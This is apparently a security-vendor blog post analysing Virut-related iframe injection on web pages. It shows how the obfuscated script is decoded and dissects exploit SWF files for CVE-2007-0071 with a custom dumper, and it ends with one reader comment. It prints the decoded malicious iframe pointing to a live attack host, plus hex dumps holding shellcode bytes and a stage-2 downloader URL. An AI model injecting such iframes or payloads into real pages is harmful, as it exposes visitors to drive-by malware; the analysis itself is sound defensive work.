Just happened to review our signature against virut-infected Web pages, and I would say, the infection is still very active until now. W32/Virut.CE is known to infect Web pages (HTML, ASP, and PHP) by injecting malicious iframe that redirects visiting users to Web sites serving malicious PDF and SWF files with different kinds of exploits. However, Virut is not the only agent of this iframe injection. Just minutes ago, I’ve searched a couple of infected Web sites specific for this injection compromise, and here’s a good example.
Figure 1 shows a Myspace account with injected iframe related to Virut. The malicious code injected, disguised as a JPG file, is actually a Web server directory that has its own main page index.html file. The index.html (detected as JS/SWF.CE!exploit) is an obfuscated HTML with malicious JavaScript inside (Figure 2).
Below is the prettyprinted code of the malicious script, which has simple obfuscation strategies.
De-obfuscation Process
First layer of obfuscation is the randomly created style name that is changing in a regular interval time. This also may serve as a simple evasion from signatures with static strings or applying script checksum with simple script normalization algorithm.
The de-obfuscation though is trivial, specially when you have the beautified malicious code in hand. If you’re still doubting your instinct, any script debugger (eg. Firebug, Spidermonkey, Malzilla, etc) will do to trace the decoding process.
First, it removes the numbers (or digits) in the HTML DIV tag with the instruction in Line 25 to get the word eval:
<div class=”bVPI9TaPJwh6″ id=”sfd”>
1e2v345a6l —–> “eval”
</div>
Next, the text in the <B> tag (Bold Text) will be split to remove the dots (‘.’).
The text is actually the malicious code, represented as decimal, and separated with dots.
Next, it converts each decimal number back to character type using String.fromCharCode() and concatenating the result to yield the final malicious iframe.
document.write(“<iframe src=’http://jl.chura.pl/rc/pdf.php’ width=1 height=1 frameborder=0></iframe>”);
Looks familiar now? Indeed, this is exactly the same injected malicious script done by W32/Virut.CE to target Web pages (HTML/ASP/PHP), which are currently detected as HTML/Virut.CE. The original malicious html file has another two iframes: i1.htm and f2.htm (Figure 2), which apparently containing malicious SWF files for Internet Explorer and Firefox respectively.
They all carry the old SWF exploit:CVE-2007-071 which was included in the APSB08-11 (Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability) security advisory from Adobe.
Nothing really interesting with this old exploit until, when I used flare, swfscan, and swfdump tools to examine the content of the files, they both unable to do the job!
Maybe because of some unknown tags or the files are simply over crafted that effectively defeats the parsing and dumping ability of the tools.
During my tests, flare was spitting out: “Unexpected end of file”, while swfscan was complaining:”Malformed data in SWF Header”, and swfdump got the worst: it was unable to handle the malformity and crashed!
So I rummaged through the hard disk to find my old, simple SWF dumper I wrote a year ago, and luckily it’s still able to do the trick:
swfdumper v0.1b (c) rplantado@fortinet.com
simple swf dumper
Usage: swfdumper [options] <file>
where:
-s -scan for exploits
-d -dump
-v -verbose
Here’s the output of the tool against one of the SWF files:
File: f115.swf
Warning:Filesize (1664) didn’t match header filesize (1544)
Offset Bytes Type Length Name
0×0010: 1144 -> (tag:[0x0045] Len:0×0004) FILEATTRIBUTES
0×0016: 0243 -> (tag:[0x0009] Len:0×0003) SETBACKGROUNDCOLOR
0x001b: 3FC1 -> (tag:[0x00FF] Len:0×0001) (null)Unknown tag: 0x3FC1
0x001e: 01BF -> (tag:[0x0006] Len:0×0400) DEFINEBITS
0×0424: 15A8 -> (tag:[0x0056] Len:0×0028) DEFINESCENEANDFRAMEDATA -> [Vulnerable: CVE-2007-0071]
0x044e: 15BF -> (tag:[0x0056] Len:0x000c) DEFINESCENEANDFRAMEDATA
0×0460: 14BF -> (tag:[0x0052] Len:0x017f) DOABCDEFINE
0x05e5: 133F -> (tag:[0x004C] Len:0×0019) SYMBOLCLASS
0×0604: 0041 -> (tag:[0x0001] Len:0×0001) SHOWFRAME
0×0607: 7900 -> (tag:[0x01E4] Len:0×0000) (null)Unknown tag: 0×7900
0×0609: 7979 -> (tag:[0x01E5] Len:0×0039) (null)Unknown tag: 0×7979
0×0644: 7474 -> (tag:[0x01D1] Len:0×0034) (null)Unknown tag: 0×7474
0x067a: 7474 -> (tag:[0x01D1] Len:0×0034) (null)Unknown tag: 0×7474
0x06b0: 0000 -> (tag:[0x0000] Len:0×0000) END
The tool was able to skip unknown tags until it finds the END tag. It has a simple exploits scanner option too to spot the vulnerable tag – DEFINESCENEANDFRAMEDATA.
You can recall that most of the malicious SWF files related to this bug were using the DEFINEBITS and DEFINEBITSJPEG tags as the shellcode container.
The tool can also dump the SWF file to check the data inside each (known) tags. Check out the SWF specification for more details about an SWF file format.
And here’s the output of the tool when you dump the SWF file:
###########################################################################
Warning:Filesize (1664) didn’t match header filesize (1544)
Offset Bytes Type Length Name
0×0010: 1144 -> (tag:[0x0045] Len:0×0004) FILEATTRIBUTES
0000: 08 00 00 00 ….
0×0016: 0243 -> (tag:[0x0009] Len:0×0003) SETBACKGROUNDCOLOR
0000: ff ff ff …
0x001b: 3FC1 -> (tag:[0x00FF] Len:0×0001) (null)Unknown tag: 0x3FC1
0000: 20
0x001e: 01BF -> (tag:[0x0006] Len:0×0400) DEFINEBITS
0000: aa 02 34 d1 f5 25 13 fc 57 82 7d ea df f6 75 73 ..4..%..W.}…us
0010: 82 1c 12 55 1d 4a b5 5e 20 f8 6b 68 55 6e 93 cf …U.J.^ .khUn..
0020: 5d 71 49 69 16 85 47 53 04 5f 05 2a e7 12 ed 8c ]qIi..GS._.*….
0030: 28 08 43 62 a5 f0 2c 5e ac 98 f9 a8 a3 5e 18 2a (.Cb..,^…..^.*
0040: 90 ba c4 f0 2c 0d f4 15 11 aa 0a a1 c2 cc bf e5 ….,………..
0050: 17 6e 6f b3 40 bc 10 6e 7d 8e 9c e8 3b 9b 3b 85 .no.@..n}…;.;.
0060: 9c 67 d0 0a bd 13 5b 14 aa 84 c8 ba 50 25 95 aa .g….[.....P%..
[< cut for brevity >]
0330: 51 3c 4e b9 88 f0 56 44 95 81 5d 5d 1e 63 af b2 Q<N…VD..]].c..
0340: 41 ff b9 d5 d5 d2 7a 8e 83 e8 d5 83 15 1b 00 8d A…..z………
0350: 5d 4f d5 97 d5 97 9b 3e 00 cf 9d 7f c8 65 a1 66 ]O…..>….e.f
0360: 6c ee cf 97 67 7e 23 1e 27 a7 b8 07 84 e8 25 9c l…g~#.’…..%.
0370: 27 2d 92 c3 40 00 3a 4a ae ee 25 9a c7 42 ce 14 ‘-..@.:J..%..B..
0380: d7 e4 e4 b4 af e1 7b 78 13 2f 6e be de 66 f1 2b ……{x./n..f.+
0390: 5e b2 5e 00 68 74 74 70 3a 2f 2f 7a 69 65 66 2e ^.^.http://zief.
03a0: 70 6c 2f 72 63 2f 6c 6f 61 64 2e 70 68 70 3f 78 pl/rc/load.php?x
03b0: 3d 53 57 46 00 00 00 00 00 00 00 00 00 00 00 00 =SWF…………
03c0: 00 00 00 00 00 00 00 00 00 00 00 00 71 71 35 33 …………qq53
03d0: 36 36 37 37 37 35 33 36 36 37 37 37 45 75 78 40 667775366777Eux@
03e0: 88 e4 cb 98 0c 4f e4 11 e0 6f 9c 5e fb f0 7b ec …..O…o.^..{.
03f0: 43 ea b3 8b d6 85 72 85 25 4e b5 ab 11 67 8a 37 C…..r.%N…g.7
0×0424: 15A8 -> (tag:[0x0056] Len:0×0028) DEFINESCENEANDFRAMEDATA
->Vulnerable from CVE-2007-0071!
0000: de 83 8e a0 08 20 20 20 20 20 20 20 20 20 20 20 …..
0010: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0020: 20 20 20 00 00 00 00 43 ….C
We will not bother to show you how to decode the shellcode as its very old already and there are pretty much available resources for doing that.
It’s just a typical shellcode that opens another malicious URL for the stage 2 malware downloader.
If you would like to reminisce how the bug was discovered, just check out Mark Dowd’s paper.
The good new is, there’s not much to worry about on this year-old exploits, because protections are very well in place.
The SWF and HTM files are proactively detected as W32/SWF!exploit.CVE2007071 and JS/SWF.A!exploit respectively by Fortinet FortiClient and FortiGate.
Nevertheless, its a good security practice to update your Adobe Flash Player with the latest version to be double safe from this old vulnerability.
All Posts
Twitter
FaceBook
LinkedIn
YouTube
Thanks for this post. Very informative. I personally would like to see info about some possible ways to fight these injections getting into our web pages. I have a site that keeps getting this iframe code injected into it and cant find out how…